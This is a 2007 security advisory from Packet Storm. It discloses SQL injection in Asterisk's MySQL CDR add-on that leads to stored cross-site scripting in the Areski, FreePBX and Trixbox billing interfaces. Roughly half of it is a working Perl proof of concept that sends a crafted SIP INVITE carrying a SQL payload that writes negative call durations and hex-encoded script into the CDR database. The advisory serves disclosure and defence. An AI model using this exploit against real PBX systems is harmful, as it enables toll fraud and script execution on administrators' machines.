phone-sqlxss.txt

2007-10-23T00:00:00
ID PACKETSTORM:60297
Type packetstorm
Reporter Radu State
Modified 2007-10-23T00:00:00

Description

                                        
                                            `In a previous post (http://seclists.org/fulldisclosure/2007/Oct/0174.html) ,  
we have seen how XSS injection can be performed over SIP to inject malicious  
JavaScript into the browser of an user that check the call history of his  
phone. In this post, we will detail how XSS injection can be performed over  
SIP by an additional SQL injection.  
  
  
  
Some SIP proxies store information gathered from SIP headers into databses  
used for billing and accounting purposes. This is also the case for the  
vulnerability disclosed In the following. If this information is not  
properly filtered, once it will be displayed to the administrator it can  
perform a second order SQL Injection, that is : during the display, it gets  
interpreted as SQL by the application. In this case, two things can result:  
First, the database can be changed (for instance the call length can be  
changed to a small value and thus the caller can do toll fraud. Sometimes,  
if the target system is not well secured, SQL injection can lead to system  
compromise because most database server allow some interaction with the  
target OS.  
  
  
  
However, the additional feature is that XSS can also result, because  
JavaScript can be stored into the database with the SQL injection and  
executed on the browser when the admin will check it (this is a kind of log  
Injection process). As was pointed out in my previous posting, XSS can be  
used with tools like Beef and XSS proxy to scan the internal network,  
deactivate firewalls, basically all the dangers of CSRF/XSRF are not a  
reality. The main issue is that most applications that deal with CDR data  
are not considering this type of threat.  
  
  
  
Title : SQL injection in asterisk-addons and XSS injection in WWW  
application in Areski, FreePBX and Trixbox  
  
  
  
Id: KIPH 12  
  
  
  
Credits   
  
Humberto Abdelnur (Ph.D student) the Madynes group at INRIA   
  
Radu State (Ph.D), the Madynes group at INRIA   
  
Olivier Festor (Ph.D), the Madynes group at INRIA   
  
  
  
  
  
Software version for which vendors were notified:   
  
  
  
Asterisk-addon (SQL injection)  
  
Areski v 2.0.1 and earlier (XSS injection)  
  
FreePBX (2.3.00 and earlier) XSS injection  
  
Tribox v.2.3.1 and earlier (XSS injection)   
  
  
  
Severity: High, XSS and SQL injection can lead to the compromise of an  
internal network  
  
  
Overview:  
  
  
  
Asterisk as itself does not support billing reports but provide libraries,  
asterisk-addon, which may allow a third entity to compute them. Specifically  
the functions exported by cdr_addon_mysql.c allows to log the Call Detail  
Records (CDR) in the MySQL database.   
  
Areski, FreePBX and Trixbox use the information stored in such database in  
order to manage, compute generate billing reports or display the load of  
the PBX.  
  
Vulnerability Synopsis:  
  
Certain functions in cdr_addon_mysql.c do not properly escaped input  
characters from fields of incoming calls before to stored them in the  
database. This issue will allow, to a malicious user, two main attacks:  
  
1. Inject SQL statements which will obfuscate the quantity of minute  
made for the billing  
2. Inject through the SQL statement values which will be recognized as  
a Java script when a WWW management application for CDR run.   
  
The attack may be performed by an unsubscribed user in the domain (if  
anonymous calls are allowed).   
This attacker may inject negative number in the CDR table in order to  
decrease the minutes of calling. Also, the attacker may inject Java Script  
tags to be executed by the administrator PC when she/he enter to the CDR  
website.   
  
Note that in order to perform the Cross Script injection, the SQL injection  
technique is necessary due that special characters as "<" are to be filtered  
by asterisk, while with the SQL injection they can be rewritten as 0x60  
(Hexadecimal representation) which wont be filtered.   
  
Impact:  
  
Information from the database can be manipulated for malicious used.   
  
Execution of malicious scripts may be executed in the administrator machine.  
  
Proof of Concept:  
  
  
The script will create an entry with duration values -9 and  
<script>alert(1)</script> that will be show when the administrator check the  
website.  
  
Command: asterisk_cdr_sqlinjection.pl <callUser> <targetIP> <targetPort>  
<attackerUser> <localIP> <localPort>   
  
--   
  
#!/usr/bin/perl  
  
  
  
#############################################  
  
# Vulnerabily discovered using KiF ~ Kiph #  
  
# #  
  
# Authors: #  
  
# Humberto J. Abdelnur (Ph.D Student) #  
  
# Radu State (Ph.D) #  
  
# Olivier Festor (Ph.D) #  
  
# #  
  
# Madynes Team, LORIA - INRIA Lorraine #  
  
# http://madynes.loria.fr #  
  
#############################################  
  
  
  
use IO::Socket::INET;  
  
use String::Random;  
  
$foo = new String::Random;  
  
  
  
die "Usage $0 <callUser> <targetIP> <targetPort> <attackerUser> <localIP>  
<localPort>" unless ($ARGV[5]);  
  
  
  
sub iso2hex($) {  
  
my $hex = '';  
  
for (my $i = 0; $i < length($_[0]); $i++) {  
  
my $ordno = ord substr($_[0], $i, 1);  
  
$hex .= sprintf("%lx", $ordno);  
  
}  
  
  
  
$hex =~ s/ $//;;  
  
$hex;  
  
}  
  
  
  
  
  
$callUser = $ARGV[0];  
  
$targetIP = $ARGV[1];  
  
$targetPort = $ARGV[2];  
  
  
  
$attackerUser = $ARGV[3];  
  
$attackerIP= $ARGV[4];  
  
$attackerPort= $ARGV[5];  
  
  
  
$socket=new IO::Socket::INET->new(  
  
Proto=>'udp',  
  
PeerPort=>$targetPort,  
  
PeerAddr=>$targetIP,  
  
LocalPort=>$attackerPort);  
  
  
  
$scriptinjection= iso2hex("<script>alert(1)</script>");  
  
$sqlinjection= "',1,2,3,4,5,-9,-9,0x$scriptinjection,6,7,8)/*";  
  
  
  
$callid= $foo->randpattern("CCccnCn");  
  
$cseq = $foo->randregex('\d\d\d\d');  
  
  
  
$sdp = "v=0\r  
  
o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r  
  
s=-\r  
  
c=IN IP4 $attackerIP\r  
  
t=0 0\r  
  
m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r  
  
a=sendrecv\r  
  
a=ptime:20\r  
  
a=maxptime:200\r  
  
a=fmtp:96 mode-change-neighbor=1\r  
  
a=fmtp:18 annexb=no\r  
  
a=fmtp:98 0-15\r  
  
a=rtpmap:96 AMR/8000/1\r  
  
a=rtpmap:0 PCMU/8000/1\r  
  
a=rtpmap:8 PCMA/8000/1\r  
  
a=rtpmap:97 iLBC/8000/1\r  
  
a=rtpmap:18 G729/8000/1\r  
  
a=rtpmap:98 telephone-event/8000/1\r  
  
a=rtpmap:13 CN/8000/1\r  
  
";  
  
$sdplen= length $sdp;  
  
  
  
$msg = "INVITE sip:$sqlinjection\@$targetIP SIP/2.0\r  
  
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1;rport\r  
  
From: <sip:$attackerUser\@$attackerIP>;tag=1\r  
  
To: <sip:$callUser\@$targetIP>\r  
  
Call-ID: $callid\@$attackerIP\r  
  
CSeq: $cseq INVITE\r  
  
Max-Forwards: 70\r  
  
Contact: <sip:$attackerUser\@$attackerIP>\r  
  
Content-Type: application/sdp\r  
  
Content-Length: $sdplen\r  
  
\r  
  
$sdp";  
  
  
  
$socket->send($msg);  
  
  
  
  
  
  
  
  
  
`